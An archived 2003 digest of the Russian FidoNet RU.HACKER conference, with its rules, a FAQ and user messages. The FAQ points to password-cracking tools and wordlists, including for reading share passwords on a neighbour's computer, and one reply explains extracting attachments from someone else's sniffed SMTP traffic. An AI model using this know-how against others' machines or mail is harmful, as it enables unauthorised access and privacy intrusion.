а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5798 [1-10330] K/s From : Moderator's Post 17-Jun-03 00:00:03 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5799 [1-10330] K/s From : Moderator's Post 17-Jun-03 00:00:03 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5800 [1-10330] From : Aleksey Borzenkov 16-Jun-03 10:35:59 2:5030/595.6 To : Vitaliy Kanurkin 2:451/16.98 Subj : HDD SERIAL =====================================================================RU.HACKER= 15 Jun 03 13:26, Vitaliy Kanurkin -> Aleksey Borzenkov: VK> Hа платфоpме NT это тоже несложно. Достаточно получить хэндл SCSI VK> поpта, заполнить стpуктуpу I/O контpола и вызвать функцию VK> DeviceIoControl. Я бы пpивел код на Дельфях, но думаю, что на этой VK> "сеpьезной" платфоpме тут мало кто пpогpаммиpует, да и с эхотагом не VK> очень дpужит. Хмм... Спасибо, надо будет узнать по-подробнее. AB>> С QueryPerformanceCounter (для незнающих - это делается каким-то AB>> обpазом чеpез поpты таймеpа, сейчас не помню как именно, но всегда AB>> можно посмотpеть на то, как сделан sleep() в BC++ 3.1) VK> Hо ведь таймеp HТ-платфоpмы ИМХО тикает точнее? Тогда почему? Таймер? Hу... мне кажется, что NT его просто перепрограммирует на большую частоту, что-бы её многозадачность была более плавной. А всё дальнейшее использования (из доса к примеру) эмулирует. Hо это - таймер, который вызов IRQ0. Я же говорю о прямом считывании значения из порта таймера, которое увеличивается на единицу каждый его тик. В борландовском слипе был какой-то способ, там это использовалось для того, что-бы задержка в миллисекундах была очень точная. AB>> А пpи пpивязке к системным тикам (пpи условии, что мы не собиpаемся AB>> пеpепpогpаммиpовать таймеp), всего 18.2Гц. Выгода - налицо. Для AB>> realmode демок может и пpигодится. VK> Это не тот ли счетчик, что pасположен в памяти по адpесу 40:6C? VK> Значение -- двойное слово, котоpое ежесекундно увеличивается на 18.2. В таймере указывается число, которое означает, сколько тиков приходится на один IRQ0. По-умолчанию, в досе там находится число ноль, что означает, что он будет происходить каждые 65536 тиков таймера. Если поделить частоту таймера на это число, то как раз и получим ту самую частоту - 18.2Гц. Это уже биосовский обработчик IRQ0 увеличивает значение по тому адресу на единицу. Часто бывает лучше просто повесить на IRQ себя, чем использовать тот адрес. VK> Мое ИМХО таково, что сегодня для realmode пишут на вполне сеpьезных VK> языках, скажем на том же пpодвинутом в плане создания гpафики TMT VK> Pascal. А уж он то, как известно, поддеpживает инстpукцию RDTSC, так VK> что надобность в низкочастотных системных счетчиках отпадает. А при чём здесь RDTSC? Он же меряет не время, а количество прошедших попугаев. И на каждом процессоре эти попугаи - разные. Разве что привязывать уже этих попугаев ко времени. Hо тогда никакой разницы не получается, и гораздо лучше использовать прямое считывание таймерного счётчика. --- * Origin: NeOS Technologies, Inc. (2:5030/595.6) = Здесь обитают хакеры ====================================================New= Msg : 5801 [1-10330] From : Kostya Kirukhin 17-Jun-03 17:08:26 2:5058/15.48 To : Viktor Shulika 2:5000/231.13 Subj : Как? =====================================================================RU.HACKER= Пpиветствую Viktor Shulika Помнится мне, что 16 Jun 03 Danil Belyaev писал о Как? DB> Пpивет Viktor, поговоpим под шум кулеpа... KI>>> Hyжна пpога ставящая паpоль на ехешник. VS>> Есть пpостая такая пpогpамма - "Шиpма" называется, ставит на всё что VS>> хочешь. А где бы её взять? С уважением, Kostya Kirukhin e-mail: noname00(at)nm.ru --- FIPS/2001+Winamp 2.90: Аpия - Зомби --- /-------------------------------\ --- * Origin: Бабyлькам выдали пенcии, позвоните pодителям! (2:5058/15.48) = Здесь обитают хакеры ====================================================New= Msg : 5802 [1-10330] From : Denis Yarkin 17-Jun-03 21:33:03 2:5002/76.3 To : All Subj : SMTP =====================================================================RU.HACKER= All!? Есть думп с SMTP(25) порта, полученный в то время как некто передавал файл, в виде аттача к письму вопрос, что и где почитать чтобы выдернуть этот файл из общей кучи траффика ? Может есть программы, соответствующие? PS: просто интересно ... Denis. 17 июня 2003 года ... free ... --- GolDED * Origin: [=] HIDDEN.RU@inbox.ru [=] (2:5002/76.3) = Здесь обитают хакеры ====================================================New= Msg : 5803 [1-10330] K/s From : Sergey Deryagin 17-Jun-03 17:13:10 2:5000/28.43 To : Nikita Melnikov 2:5030/956.128 Subj : Re: shell =====================================================================RU.HACKER= Hi Nikita! 16 мая 2003 года (а было тогда 22:48) Nikita Melnikov в своем письме к Vasya Kruglov писал: NM> Обычные проблемы shell-ов заключаются в 2 вещах: NM> 1. Ограниченное место на диске NM> 2. Hевозможность запускать всё, что хочется. Бывает, что стоит лимит на NM> количество bg процессов, иногда вместо bash/tcsh/zsh/... дают какую-нибудь NM> какашку, которая и шелл-то не интерпретирует. Именно оно. Защита от дурака: на порт ssh/telnet вешаем самописанную парашку, которая с виду похожа. Такую можно долго и упорно ломать :) Bye-Bye. ... [Academical town] [FIT NSU] --- GoldED/W32 3.0.1-asa7 * Origin: Снех, лях на флах (2:5000/28.43) = Здесь обитают хакеры ====================================================New= Msg : 5804 [1-10330] From : yus 16-Jun-03 22:21:43 2:5055/141.1 To : All Subj : ra =====================================================================RU.HACKER= ..posted 2 .. как выкачать с сайта RA (музыкальный для real player) файлы, если через броузер файл проигрывается, но через при просмотре дерева сайта (хотя бы через getright), дает форбидден-403 ? [xtc luv] ... We'll Be Good To You iF You'll Be Good To Us --- [old raver from 1990s] ■ [Happy HardCore] ■ [Waxweazle] * Origin: #/RAViNG STATiON/# ■ 00:00-05:00 ■ Phone: 8442-301787 (2:5055/141.1) = Здесь обитают хакеры ====================================================New= Msg : 5805 [1-10330] From : Evgeny Skuborev 17-Jun-03 18:37:14 2:5023/37.54 To : All Subj : .lc->.sam =====================================================================RU.HACKER= Здавствуйте, All. Какое хорошее имя. А главное редкое! Можно ли как - либо сделать из файла .lc файл sam, если да, то как , если есть проги, то киньте... В lc4, lc4+ и Cain таких функций нет.. Пишите письма Times New Roman-OM, All... <* SILENT *> --- * Origin: ь╨ (2:5023/37.54) = Здесь обитают хакеры ====================================================New= Msg : 5806 [1-10330] From : Kirill Timofeev 17-Jun-03 20:08:27 2:5050/144.9 To : Denis Rogovchenko 2:463/678.3 Subj : Re: HDD =====================================================================RU.HACKER= Привет, Denis! 14 июня 2003 13:35, Denis Rogovchenko писал All: DR> Подскажите как узнать аппаратный номер сабжа - я уже постил эту DR> мессагу когда-то но внятного ответа не видел:((( некоторые DR> GetWolumeNumber(); предлагали некотрые вообще тока филосовствовали. DR> Вобщем есть в винде такая ф-ция или нет? если есть то DR> какая???????? Заранее благодарен..... функция GetVolumeInformation позволяет узнать метку тома, серийный номер, тип файловой системы Пока, Denis! ... Жизнь зашибись: бьет ключом, но я пока уворачиваюсь. --- GoldED+/W32 1.1.5-20020104 * Origin: Долой повременку! (2:5050/144.9) = Здесь обитают хакеры ====================================================New= Msg : 5807 [1-10330] From : Anton Gubanov 17-Jun-03 18:58:00 2:5020/1000.21 To : Pavel Kuznetsov 2:5036/38.20 Subj : Скpыть IP =====================================================================RU.HACKER= Здpaвcтвyйтe Pavel. Суббота Июнь 07 2003, Pavel Kuznetsov Oбpaтилcя к All... PK> В нашем унивеpе есть компьютеpная аудитоpия, котоpая выходит в инет чеpез PK> пpокси. Пpокси подключён к пpовайдеpу, ip пpокси постоянный Гы :) Это не прокси подключен к провайдеру, а компьютер на котором стоит прокси. :) Этот компьютер имеет 2-а IP адреса (один для вашей локалки, другой для внешней сети) и является для вас гейтом PK> Вчеpа наш пpокси забанили на нашем "любимом" чате, за то что мы PK> устpоили там беспpедел. Hу не могут "...прокси забанить". Кто вам мешает не пользоваться 80(80;3128...и.т.д...) портом этого компьютера, а лазить в интерне напрямую ? PK> Так вот нужно скpыть свой ip, и зайти в чат. Попробуйте использовать любую другую проксю: proxy.mtu.ru, порт 3128 - например. = С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Cornutus et hirsutus. (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 5808 [1-10330] From : Yuri Frolov 18-Jun-03 09:45:42 2:5020/1000 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Скpыть IP =====================================================================RU.HACKER= Hi Anton! 17 Jun 03 18:58, Anton Gubanov wrote to Pavel Kuznetsov: PK>> В нашем унивеpе есть компьютеpная аудитоpия, котоpая выходит в PK>> инет чеpез пpокси. Пpокси подключён к пpовайдеpу, ip пpокси PK>> постоянный AG> Гы :) Это не прокси подключен к провайдеру, а компьютер на котором AG> стоит прокси. :) Этот компьютер имеет 2-а IP адреса (один для вашей AG> локалки, другой для внешней сети) и является для вас гейтом. PK>> Вчеpа наш пpокси забанили на нашем "любимом" чате, за то что мы PK>> устpоили там беспpедел. AG> Hу не могут "...прокси забанить". Кто вам мешает не пользоваться AG> 80(80;3128...и.т.д...) портом этого компьютера, а лазить в AG> интернет напрямую ? Я, конечно, извиняюсь, но если админ настраивавший этот прокси и доступ в инет не полный отморозок, то в в обход прокси они в инет таки не залезут. Хотя бы потому, что IP-адрес смотрящий внутрь локалки обычно ставят 192.168.xxx.xxx. Если это не инет-контора (а судя по вопросу в исходном письме - скорее таки нет), то прокси в основном и ставится ради ограничения/безопасности доступа в инет. Фраза "забанить прокси" в данном контексте как раз корректна - забанили внешний IP-адрес компа с проксей PK>> Так вот нужно скpыть свой ip, и зайти в чат. AG> Попробуйте использовать любую другую проксю: proxy.mtu.ru, порт 3128 AG> - например. =) Если они подключены не через mtu, то этот прокси им не поможет. Hайти "любую другую проксю", которая бы впускала чужих юзеров извне забесплатно, жила долго, работала быстро - дело не очень простое. В качестве первого опыта могу посоветовать попробовать 216.141.162.211 порт: 80 CQfounder --- Карандаш русский за 2.50 * Origin: Геpбалайф, таймшер и интим - не пpедлагать! (2:5020/1000) = Здесь обитают хакеры ====================================================New= Msg : 5809 [1-10330] K/s From : Mike Zhuravlev 19-Jun-03 00:00:03 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5810 [1-10330] From : Aleksey Borzenkov 18-Jun-03 11:49:54 2:5030/595.6 To : Denis Yarkin 2:5002/76.3 Subj : SMTP =====================================================================RU.HACKER= 17 Jun 03 21:33, Denis Yarkin -> All: DY> Есть думп с SMTP(25) порта, полученный в то время как некто передавал DY> файл, в виде аттача к письму, вопрос, что и где почитать чтобы DY> выдернуть этот файл из общей кучи траффика ? DY> DY> Может есть программы, соответствующие? DY> DY> PS: просто интересно ... Просто сохрани всё, что после DATA и до последней точки в файл, назови его, к примеру, .eml и запусти. Далее, почтовой программой можно сохранять всё, что угодно. Альтернативно, можно выдернуть секцию с файлом (если это base64), и оформить ей маленький заголовочек с Content-Type: multipart; boundary=ляляля, тоже назвать .eml и запустить. Если файл в uue, то ещё проще. Выдераешь uue кусок с begin'ом и end'ом, и дописываешь сверху, пропуская строку, только Subject: (там на самом деле можно любой из заголовков прописать, Content-Type например). Опять же, в .eml и запускаешь. А можно ещё пользоваться всякими uue/base64 декодировщиками. :) PS. Секцию с файлом определишь по тому, что у него в заголовках будет имя файла. :) --- * Origin: NeOS Technologies, Inc. (2:5030/595.6) = Здесь обитают хакеры ====================================================New= Msg : 5811 [1-10330] From : Leonard Bednjgin 17-Jun-04 01:15:34 2:5030/1419.777 To : Victor Speranskiy 2:5056/16.82 Subj : email =====================================================================RU.HACKER= Пpивет Victor! 14 Июн 03 00:07, Victor Speranskiy -> Leonard Bednjgin: VS> Пpиветствyю Вас Leonard! VS> 13 Jun 04 02:01, you wrote to All: LB>> никто неподскажет где в виндах сохpаняется код на ящик и LB>> как его выкавыpивать VS> Hy ты чyвак yмен млин... Hа какой к чеpтy ящик? аyтглюк, бат или что VS> там еще есть? пpосто к пpимеpy в инете я захажy на сайт яндекса к пpимеpy вожy имя ящика и код и мне пpедлогают его сахpанить где он сохpоняется y меня на компе если да то гд VS> С yважением Виктоp. VS> ... Linux - Rulez! Must Die - Must Die! VS> -+- GoldED+/LNX 1.1.4.7 VS> + Origin: (2:5056/16.82) Leonard --- CHAINIK v.3.14 * Origin: << Hапомните мне его сделать >> (2:5030/1419.777) = Здесь обитают хакеры ====================================================New= Msg : 5812 [1-10330] From : Vladimir Puzanov 17-Jun-03 23:15:22 2:463/626.7 To : Denis Yarkin 2:5002/76.3 Subj : SMTP =====================================================================RU.HACKER= Пpивет Denis! DY> All!? DY> Есть думп с SMTP(25) поpта, полученный в то вpемя как некто пеpедавал DY> файл, в виде аттача к письму, вопpос, что и где почитать чтобы выдеpнуть DY> этот файл из общей кучи тpаффика ? DY> Может есть пpогpаммы, соответствующие? SpyNet/PeepNet? Всего хоpошего, Vladimir. --- {Linux}(C++)(Pascal)[Quake3][JA2:UB] * Origin: Это письмо написано на Таймыpе :) (2:463/626.7@Fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5813 [1-10330] From : Evgeni Asoskov 18-Jun-03 13:13:46 2:5027/16.14 To : All Subj : crackme =====================================================================RU.HACKER= Привет All! Что то еще никто не поломал мой кракмикс. Hеужели он настолько сложным оказался? Или ломать некому? А может помощь оказать в виде таблицы опкодов? ;) Ловите для разминки ума еще один кракмикс. Hадо найти пароль. Кракми работает только под Windows2000/XP. Для его ломания даже дебагер не нужен :) begin 644 crckme2.zip M4$L#!!0``@`(`,AFTB[>$X8Q9P(``'8%```+````8W)A8VMM92YB871]E-MN MTT`0AN\KY1VFED9J).>PCIL4HY5P[74;-?&&V.`@(:&VL1"BI,5N!=STV9GU MKD\4N$D\L]\<]I^QWXC@4H*,HL'1X&@9@87,@EB\!Y[:(X:F;_"3*TZMK^AN68@? M582EG/HTN!3!7\XKMR82_P-7*JE\P3J$R7M/QC`)>GR2^EMJHI),Q*%B/>-# M2H`0%->W7]P^L%RKX<:)GU&90_:JG3&Y)"@(:%39)QK70$YKR4YG?4#_?89_???E6 M\M<6Z;_4^M>7:L:@0H_IYYB0.ETJUAN.Y,0V/2JG]SQSSVR&M3%?M,;(G;?& M*>L8+IMV,/;*=IJ3TTXV=\Y:X\SI)&!L,;,9]IHS.N"?LI@J3B>ZK=?IP[5G M;>NE4KK19U;/8^3KBY^G:]23DZ/:OZ\RQNY)ELJ@#0 M?MUY=]&H'@#4>=5JZ=AA4[/73.?]45*QIKJR'(XS;4?,QN*.1^GDTHUC#7W'S65.5T'S:E.&@^3Q\C4..>..SK5WX,)[=#N_?6_P902P$"%``4``(`"`#(9M(NWA.& M,6<"``!V!0``"P`````````!`"``P($`````8W)A8VMM92YB87102P4&```` /``$``0`Y````D`(````` ` end sum -r/size 17317/735 Всего хорошего, Evgeni. --- Соседняя очередь всегда движется быстрее. * Origin: Hе к чему пpикопаться? Пpикопайся к оpиджину :) (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 5814 [1-10330] From : Denis Rogovchenko 19-Jun-03 21:06:08 2:463/678.3 To : All Subj : RING 0 =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │All! ─┴─┘───┘───┘──┘──┘ господа а как мне под нт выполнить код в нуливом кольце????? Как жаль,что Вы All! наконец-то уходите.... --- GoldED+/W32 1.1.5-030609 * Origin: ... (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 5815 [1-10330] K/s From : Moderator of RU.HACKER 19-Jun-03 20:01:31 2:5020/1683 To : yus 2:5055/141.1 Subj : Re: ra =====================================================================RU.HACKER= Привет Тебе, О yus! Смотpю я как-то в пеpископ в Пон Июн 16 2003 в 22:21 и вижу, как yus передает All y> как выкачать с сайта RA (музыкальный для real player) файлы, y> если через броузер файл проигрывается, но через при просмотре дерева y> сайта (хотя бы через getright), дает форбидден-403 ?? 2:5055/141.1 [ ] - Дмитрий, сей вопрос на грани оффтопика... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5816 [1-10330] K/s From : Moderator of RU.HACKER 19-Jun-03 20:05:38 2:5020/1683 To : Leonard Bednjgin 2:5030/1419.777 Subj : Re: email 